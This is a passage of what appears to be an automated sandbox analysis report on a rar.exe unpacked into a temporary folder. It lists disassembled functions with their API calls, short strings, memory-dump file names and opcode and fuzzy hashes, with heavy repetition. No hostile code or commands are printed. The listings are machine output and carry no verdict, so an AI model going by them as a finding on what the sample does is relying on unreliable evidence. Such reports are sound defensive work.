                                                              • Instruction Fuzzy Hash: 9941E112D0C59FC1EF21AF304E511BF5251AFD3B86F584235DA0D866D6EE2EE4A1B223
                                                              Function 00007FF629B242CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: wcschr$swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 1303626722-3142399695
                                                              • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                              • Instruction ID: 305d2fc9bea1b4b345e8d6625ef63173a87f35c38770d3023a4ffc078834b931
                                                              • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                              • Instruction Fuzzy Hash: 0B119312E1874981EE146F1199010AE7371EF8ABD1B289531CF6E83FD6DF3CE4619202
                                                              Function 00007FF629B42984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                              • String ID:
                                                              • API String ID: 904936192-0
                                                              • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                              • Instruction ID: 756c5c5305fa8da085a31c8ff3dda93508c4f5fef414429106529d22b302c04e
                                                              • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                              • Instruction Fuzzy Hash: 0251F122A19A8982EF00CF25D8603AE73A1FBC5B98F049231DE5E87795DF39D111E701
                                                              Function 00007FF629B40244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                              • String ID:
                                                              • API String ID: 932687459-0
                                                              • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                              • Instruction ID: eb618cf05b5994c66f2386129c0b94ca273e11c3345e6bf08a27fbcc4a944e57
                                                              • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                              • Instruction Fuzzy Hash: E841F762E0CACA85EF509F20D8603FF2790EF96B85F141431DB4C96699DF2CD445BB12
                                                              Function 00007FF629B55120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                              • String ID:
                                                              • API String ID: 4141327611-0
                                                              • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                              • Instruction ID: b55858814fa80f87f6b8f5c07a9dffa8ad8f79cec9675be7dbd813e4acbe4259
                                                              • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                              • Instruction Fuzzy Hash: AD41A521A0D74646FF658E51D84037F66A1AFC6B93F144130DA4CC6AD5CF7DE441EB02
                                                              Function 00007FF629B0D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D09D
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D0E5
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D114
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D15C
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                              • Instruction ID: 29ae88fcd743a6fbdc38d62013ac0d185e1469cc272d9ed857638cdb665a5519
                                                              • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                              • Instruction Fuzzy Hash: 1D316332618B4942EB608F11E95476F77A1F7CABA8F505329EAAC47BC8CF3DD0049B01
                                                              Function 00007FF629B2CFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF629B3B6D0: Sleep.KERNEL32(?,?,?,?,00007FF629B0CBED,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B3B730
                                                              • new.LIBCMT ref: 00007FF629B2CFD9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: rar$rev
                                                              • API String ID: 3472027048-2145959568
                                                              • Opcode ID: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
                                                              • Instruction ID: 972c8a12253128bf1f5c6f56c2b2f034c03f9e0a56b13cc46cb08f736cef1cba
                                                              • Opcode Fuzzy Hash: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
                                                              • Instruction Fuzzy Hash: 4FA1D122E0869A81EE10DF21C8542BE6365FFC6B86F554036DA5D87ED6DF3CE544E302
                                                              Function 00007FF629B55CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: e+000$gfff
                                                              • API String ID: 3215553584-3030954782
                                                              • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                              • Instruction ID: cd3fad34d3de998e3b15bac42dac4d01c139fa50fe85e63748e73b60fc4c8c67
                                                              • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                              • Instruction Fuzzy Hash: 72511762B287C546EB258F39DC4136E7A91EB82B92F08D231C69CC7BD6CE6CE4449701
                                                              Function 00007FF629B53B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe
                                                              • API String ID: 3307058713-2623522826
                                                              • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                              • Instruction ID: a59c86e92d68c902ed49b2e341f2d5ae71cc18d6d8baa46826d321b962dda02e
                                                              • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                              • Instruction Fuzzy Hash: C7419E32A08B5AC5EF14EF25DC800BE77A5EB86BC5B548035E90E83B55DF3DE481A302
                                                              Function 00007FF629B37C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilewcsstr
                                                              • String ID: System Volume Information\
                                                              • API String ID: 1592324571-4227249723
                                                              • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                              • Instruction ID: e9c022cc92f4bf02e869f5be14d38bda153ab7c135b9c8885eb43c400e7fda72
                                                              • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                              • Instruction Fuzzy Hash: 2631C022A1968646EF54DF31A9906FF6760AF87BC1F444030EE4D87B96DE3CE441A706
                                                              Function 00007FF629B33C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: snprintf
                                                              • String ID: $%s$@%s
                                                              • API String ID: 4288800496-834177443
                                                              • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                              • Instruction ID: 3d58edf04852cd0a4a2b16de7b2d24127981d59dce8c0c33f80c0dcaf446123e
                                                              • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                              • Instruction Fuzzy Hash: 7E318D62A19A8A96EE10DF35E8407FF2360EBC6785F800032EE0D97B95DE3CE505E705
                                                              Function 00007FF629B349F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID: Done
                                                              • API String ID: 2948472770-499744565
                                                              • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                              • Instruction ID: a51661e60a755f451e61379f93ca4ff84bf3e2668f7ed3791718441e8200ece1
                                                              • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                              • Instruction Fuzzy Hash: 66113065B14B4A86EA149F16EC4016EB7A1FBDAFC1F548436CE0DD3324DE3CE5429245
                                                              Function 00007FF629AF5DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: ;%%0%du
                                                              • API String ID: 233258989-2249936285
                                                              • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                              • Instruction ID: 4aef17a3e6639a076220c8043874a79cfdd6b7a88be5d35afd65d33637c1f816
                                                              • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                              • Instruction Fuzzy Hash: 3011B222A1868542EF20DF24E8143EE7760FBC9788F595131DF8C8769ADE3CE545DB41
                                                              Function 00007FF629B1331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF629B242CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF629B2430F
                                                              • GetVolumeInformationW.KERNEL32(?,00007FF629B10BED,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B1337E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
